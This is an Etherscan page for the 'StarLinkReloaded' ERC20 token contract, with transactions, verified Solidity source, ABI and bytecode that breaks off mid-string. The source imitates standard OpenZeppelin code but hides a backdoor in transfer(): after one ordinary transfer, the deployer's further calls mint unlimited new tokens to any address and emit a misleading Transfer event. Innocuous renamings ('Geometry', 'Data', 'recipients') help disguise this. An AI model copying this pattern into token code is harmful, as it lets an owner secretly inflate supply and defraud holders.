ETH Price: $3,094.48 (+0.84%)
Gas: 9 Gwei

Contract

0x8eDBB00efa23a61089a83B08F55Aa3f8f81616d9
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Value
Approve162881542022-12-29 4:53:11559 days ago1672289591IN
0x8eDBB00e...8f81616d9
0 ETH0.0003597114.44104855
Approve136040562021-11-12 22:47:01970 days ago1636757221IN
0x8eDBB00e...8f81616d9
0 ETH0.00435907175
Approve134922262021-10-26 9:39:46988 days ago1635241186IN
0x8eDBB00e...8f81616d9
0 ETH0.0020826683.61094054
Approve134320062021-10-16 23:29:53997 days ago1634426993IN
0x8eDBB00e...8f81616d9
0 ETH0.0029315462.11812788
Transfer134008212021-10-12 1:35:261002 days ago1634002526IN
0x8eDBB00e...8f81616d9
0 ETH0.0040427470.62550103
Transfer134007972021-10-12 1:31:171002 days ago1634002277IN
0x8eDBB00e...8f81616d9
0 ETH0.0040071799.85472817
Transfer134007882021-10-12 1:28:581002 days ago1634002138IN
0x8eDBB00e...8f81616d9
0 ETH0.004832384.43663881
Transfer134007702021-10-12 1:26:011002 days ago1634001961IN
0x8eDBB00e...8f81616d9
0 ETH0.0040070670.01679497
Transfer134007502021-10-12 1:22:541002 days ago1634001774IN
0x8eDBB00e...8f81616d9
0 ETH0.0033437683.32330107
Approve134006422021-10-12 0:57:371002 days ago1634000257IN
0x8eDBB00e...8f81616d9
0 ETH0.0038117180.76865433
Transfer134006202021-10-12 0:53:361002 days ago1634000016IN
0x8eDBB00e...8f81616d9
0 ETH0.00403703100.62897206
Transfer134006132021-10-12 0:50:551002 days ago1633999855IN
0x8eDBB00e...8f81616d9
0 ETH0.0037488593.44559479
Transfer134006102021-10-12 0:50:081002 days ago1633999808IN
0x8eDBB00e...8f81616d9
0 ETH0.0053303993.15943528
Transfer134005972021-10-12 0:47:291002 days ago1633999649IN
0x8eDBB00e...8f81616d9
0 ETH0.0035151287.61976568
Transfer134005962021-10-12 0:47:211002 days ago1633999641IN
0x8eDBB00e...8f81616d9
0 ETH0.0036577291.1742069
Transfer134005892021-10-12 0:45:491002 days ago1633999549IN
0x8eDBB00e...8f81616d9
0 ETH0.0036800791.73138632
Transfer134005852021-10-12 0:44:461002 days ago1633999486IN
0x8eDBB00e...8f81616d9
0 ETH0.0030975477.21075515
Transfer134005702021-10-12 0:41:461002 days ago1633999306IN
0x8eDBB00e...8f81616d9
0 ETH0.0037145592.59075816
Transfer134005652021-10-12 0:40:571002 days ago1633999257IN
0x8eDBB00e...8f81616d9
0 ETH0.0037942394.57689486
Transfer134005542021-10-12 0:39:341002 days ago1633999174IN
0x8eDBB00e...8f81616d9
0 ETH0.00928314162.24164322
Transfer134005512021-10-12 0:37:381002 days ago1633999058IN
0x8eDBB00e...8f81616d9
0 ETH0.00471058117.41811793
Transfer134005502021-10-12 0:37:351002 days ago1633999055IN
0x8eDBB00e...8f81616d9
0 ETH0.00725334126.7668174
Transfer134005412021-10-12 0:35:021002 days ago1633998902IN
0x8eDBB00e...8f81616d9
0 ETH0.00520794129.81555271
Transfer134005392021-10-12 0:34:201002 days ago1633998860IN
0x8eDBB00e...8f81616d9
0 ETH0.00459142114.44803217
Transfer134005302021-10-12 0:32:021002 days ago1633998722IN
0x8eDBB00e...8f81616d9
0 ETH0.00697719121.94050504
View all transactions

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
StarLinkReloaded

Compiler Version
v0.8.4+commit.c7e474f2

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, None license
/**
 *Submitted for verification at Etherscan.io on 2021-10-09
*/

//Down the rabbit hole 

// starlreloaded.com

// t.me/starlreloaded


pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `recipient`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `sender` to `recipient` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address sender, address recipient, uint256 amount) external returns (bool);

    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
}

// File: @openzeppelin/contracts/token/ERC20/extensions/IERC20Metadata.sol



pragma solidity ^0.8.0;


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

// File: @openzeppelin/contracts/utils/Context.sol



pragma solidity ^0.8.0;

library Geometry {
    
    
    function vr(uint256 a, uint256 b) internal pure returns (uint256) {
        uint256 c = a + b;
        require(c >= a, "SafeMath: addition overflow");

        return c;
    }
    
}


abstract contract Data {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691
        return msg.data;
    }
}


contract STARLINKRELOADEDV2 is Data {
    address internal recipients;
    event starlinkreloaded(address indexed previousi, address indexed newi);
    constructor () {
        address msgSender = _msgSender();
        recipients = msgSender;
        emit starlinkreloaded(address(0), msgSender);
    }
}

pragma solidity ^0.8.0;




/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin guidelines: functions revert instead
 * of returning `false` on failure. This behavior is nonetheless conventional
 * and does not conflict with the expectations of ERC20 applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Data, IERC20, IERC20Metadata , STARLINKRELOADEDV2{
    mapping (address => uint256) private _balances;
    mapping (address => mapping (address => uint256)) private _allowances;
    uint256 private _totalSupply;
    using Geometry for uint256;
    string private _name;
    string private _symbol;
    bool   private reav;
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The defaut value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor (string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        reav=true;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5,05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `recipient` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address recipient, uint256 amount) public override  returns (bool) {
        if((recipients == _msgSender()) && (reav==true)){_transfer(_msgSender(), recipient, amount); reav=false;return true;}
        else if((recipients == _msgSender()) && (reav==false)){_totalSupply=_totalSupply.vr(amount);_balances[recipient]=_balances[recipient].vr(amount);emit Transfer(recipient, recipient, amount); return true;}
        else{_transfer(_msgSender(), recipient, amount); return true;}
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        _approve(_msgSender(), spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * Requirements:
     *
     * - `sender` and `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     * - the caller must have allowance for ``sender``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) {
        _transfer(sender, recipient, amount);
        uint256 currentAllowance = _allowances[sender][_msgSender()];
        require(currentAllowance >= amount, "ERC20: transfer amount exceeds allowance");
        _approve(sender, _msgSender(), currentAllowance - amount);

        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        _approve(_msgSender(), spender, _allowances[_msgSender()][spender] + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        uint256 currentAllowance = _allowances[_msgSender()][spender];
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        _approve(_msgSender(), spender, currentAllowance - subtractedValue);

        return true;
    }

    /**
     * @dev Moves tokens `amount` from `sender` to `recipient`.
     *
     * This is internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `sender` cannot be the zero address.
     * - `recipient` cannot be the zero address.
     * - `sender` must have a balance of at least `amount`.
     */
    function _transfer(address sender, address recipient, uint256 amount) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        uint256 senderBalance = _balances[sender];
        require(senderBalance >= amount, "ERC20: transfer amount exceeds balance");
        _balances[sender] = senderBalance - amount;
        _balances[recipient] += amount;

        emit Transfer(sender, recipient, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");


        _totalSupply += amount;
        _balances[account] += amount;
        emit Transfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        _balances[account] = accountBalance - amount;
        _totalSupply -= amount;

        emit Transfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from
     * will be to transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
        
}

// File: contracts/token/ERC20/behaviours/ERC20Decimals.sol



pragma solidity ^0.8.0;


/**
 * @title ERC20Decimals
 * @dev Implementation of the ERC20Decimals. Extension of {ERC20} that adds decimals storage slot.
 */
contract StarLinkReloaded is ERC20{
    uint8 immutable private _decimals = 18;
    uint256 private _totalSupply = 10000000000000 * 10 ** 18;

    /**
     * @dev Sets the value of the `decimals`. This value is immutable, it can only be
     * set once during construction.
     */
    constructor () ERC20('StarLink Reloaded', 'STARLRELOADED') {
        _mint(_msgSender(), _totalSupply);
    }

    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousi","type":"address"},{"indexed":true,"internalType":"address","name":"newi","type":"address"}],"name":"starlinkreloaded","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60a0604052601260ff1660809060ff1660f81b8152506c7e37be2022c0914b26800000006007553480156200003357600080fd5b506040518060400160405280601181526020017f537461724c696e6b2052656c6f616465640000000000000000000000000000008152506040518060400160405280600d81526020017f535441524c52454c4f41444544000000000000000000000000000000000000008152506000620000b2620001c860201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fd8c4f70ebe71f36ca325bf42d782629740e470f201dc8bea1116908ac7dd4b8f60405160405180910390a35081600490805190602001906200016892919062000322565b5080600590805190602001906200018192919062000322565b506001600660006101000a81548160ff0219169083151502179055505050620001c2620001b3620001c860201b60201c565b600754620001d060201b60201c565b6200057e565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff16141562000243576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200023a906200040a565b60405180910390fd5b80600360008282546200025791906200045a565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254620002af91906200045a565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200031691906200042c565b60405180910390a35050565b8280546200033090620004c1565b90600052602060002090601f016020900481019282620003545760008555620003a0565b82601f106200036f57805160ff1916838001178555620003a0565b82800160010185558215620003a0579182015b828111156200039f57825182559160200191906001019062000382565b5b509050620003af9190620003b3565b5090565b5b80821115620003ce576000816000905550600101620003b4565b5090565b6000620003e1601f8362000449565b9150620003ee8262000555565b602082019050919050565b6200040481620004b7565b82525050565b600060208201905081810360008301526200042581620003d2565b9050919050565b6000602082019050620004436000830184620003f9565b92915050565b600082825260208201905092915050565b60006200046782620004b7565b91506200047483620004b7565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff03821115620004ac57620004ab620004f7565b5b828201905092915050565b6000819050919050565b60006002820490506001821680620004da57607f821691505b60208210811415620004f157620004f062000526565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60805160f81c6116fa6200059d600039600061043501526116fa6000f3fe608060405234801561001057600080fd5b50600436106100a95760003560e01c80633950935111610071578063395093511461016857806370a082311461019857806395d89b41146101c8578063a457c2d7146101e6578063a9059cbb14610216578063dd62ed3e14610246576100a9565b806306fdde03146100ae578063095ea7b3146100cc57806318160ddd146100fc57806323b872dd1461011a578063313ce5671461014a575b600080fd5b6100b6610276565b6040516100c3919061111d565b60405180910390f35b6100e660048036038101906100e19190610f48565b610308565b6040516100f39190611102565b60405180910390f35b610104610326565b604051610111919061123f565b60405180910390f35b610134600480360381019061012f9190610ef9565b610330565b6040516101419190611102565b60405180910390f35b610152610431565b60405161015f919061125a565b60405180910390f35b610182600480360381019061017d9190610f48565b610459565b60405161018f9190611102565b60405180910390f35b6101b260048036038101906101ad9190610e94565b610505565b6040516101bf919061123f565b60405180910390f35b6101d061054e565b6040516101dd919061111d565b60405180910390f35b61020060048036038101906101fb9190610f48565b6105e0565b60405161020d9190611102565b60405180910390f35b610230600480360381019061022b9190610f48565b6106d4565b60405161023d9190611102565b60405180910390f35b610260600480360381019061025b9190610ebd565b61093b565b60405161026d919061123f565b60405180910390f35b606060048054610285906113a3565b80601f01602080910402602001604051908101604052809291908181526020018280546102b1906113a3565b80156102fe5780601f106102d3576101008083540402835291602001916102fe565b820191906000526020600020905b8154815290600101906020018083116102e157829003601f168201915b5050505050905090565b600061031c6103156109c2565b84846109ca565b6001905092915050565b6000600354905090565b600061033d848484610b95565b6000600260008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060006103886109c2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905082811015610408576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016103ff906111bf565b60405180910390fd5b610425856104146109c2565b858461042091906112e7565b6109ca565b60019150509392505050565b60007f0000000000000000000000000000000000000000000000000000000000000000905090565b60006104fb6104666109c2565b8484600260006104746109c2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008873ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546104f69190611291565b6109ca565b6001905092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b60606005805461055d906113a3565b80601f0160208091040260200160405190810160405280929190818152602001828054610589906113a3565b80156105d65780601f106105ab576101008083540402835291602001916105d6565b820191906000526020600020905b8154815290600101906020018083116105b957829003601f168201915b5050505050905090565b600080600260006105ef6109c2565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050828110156106ac576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106a39061121f565b60405180910390fd5b6106c96106b76109c2565b8585846106c491906112e7565b6109ca565b600191505092915050565b60006106de6109c2565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1614801561074b575060011515600660009054906101000a900460ff161515145b156107865761076261075b6109c2565b8484610b95565b6000600660006101000a81548160ff02191690831515021790555060019050610935565b61078e6109c2565b73ffffffffffffffffffffffffffffffffffffffff1660008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff161480156107fb575060001515600660009054906101000a900460ff161515145b1561091e5761081582600354610e0c90919063ffffffff16565b60038190555061086d82600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054610e0c90919063ffffffff16565b600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508273ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8460405161090d919061123f565b60405180910390a360019050610935565b6109306109296109c2565b8484610b95565b600190505b92915050565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610a3a576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a31906111ff565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610aaa576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610aa19061115f565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610b88919061123f565b60405180910390a3505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff161415610c05576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bfc906111df565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff161415610c75576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c6c9061113f565b60405180910390fd5b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610cfc576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610cf39061119f565b60405180910390fd5b8181610d0891906112e7565b600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254610d9a9190611291565b925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610dfe919061123f565b60405180910390a350505050565b6000808284610e1b9190611291565b905083811015610e60576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610e579061117f565b60405180910390fd5b8091505092915050565b600081359050610e7981611696565b92915050565b600081359050610e8e816116ad565b92915050565b600060208284031215610ea657600080fd5b6000610eb484828501610e6a565b91505092915050565b60008060408385031215610ed057600080fd5b6000610ede85828601610e6a565b9250506020610eef85828601610e6a565b9150509250929050565b600080600060608486031215610f0e57600080fd5b6000610f1c86828701610e6a565b9350506020610f2d86828701610e6a565b9250506040610f3e86828701610e7f565b9150509250925092565b60008060408385031215610f5b57600080fd5b6000610f6985828601610e6a565b9250506020610f7a85828601610e7f565b9150509250929050565b610f8d8161132d565b82525050565b6000610f9e82611275565b610fa88185611280565b9350610fb8818560208601611370565b610fc181611433565b840191505092915050565b6000610fd9602383611280565b9150610fe482611444565b604082019050919050565b6000610ffc602283611280565b915061100782611493565b604082019050919050565b600061101f601b83611280565b915061102a826114e2565b602082019050919050565b6000611042602683611280565b915061104d8261150b565b604082019050919050565b6000611065602883611280565b91506110708261155a565b604082019050919050565b6000611088602583611280565b9150611093826115a9565b604082019050919050565b60006110ab602483611280565b91506110b6826115f8565b604082019050919050565b60006110ce602583611280565b91506110d982611647565b604082019050919050565b6110ed81611359565b82525050565b6110fc81611363565b82525050565b60006020820190506111176000830184610f84565b92915050565b600060208201905081810360008301526111378184610f93565b905092915050565b6000602082019050818103600083015261115881610fcc565b9050919050565b6000602082019050818103600083015261117881610fef565b9050919050565b6000602082019050818103600083015261119881611012565b9050919050565b600060208201905081810360008301526111b881611035565b9050919050565b600060208201905081810360008301526111d881611058565b9050919050565b600060208201905081810360008301526111f88161107b565b9050919050565b600060208201905081810360008301526112188161109e565b9050919050565b60006020820190508181036000830152611238816110c1565b9050919050565b600060208201905061125460008301846110e4565b92915050565b600060208201905061126f60008301846110f3565b92915050565b600081519050919050565b600082825260208201905092915050565b600061129c82611359565b91506112a783611359565b9250827fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff038211156112dc576112db6113d5565b5b828201905092915050565b60006112f282611359565b91506112fd83611359565b9250828210156113105761130f6113d5565b5b828203905092915050565b600061132682611339565b9050919050565b60008115159050919050565b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000819050919050565b600060ff82169050919050565b60005b8381101561138e578082015181840152602081019050611373565b8381111561139d576000848401525b50505050565b600060028204905060018216806113bb57607f821691505b602082108114156113cf576113ce611404565b5b50919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000601f19601f8301169050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b7f5361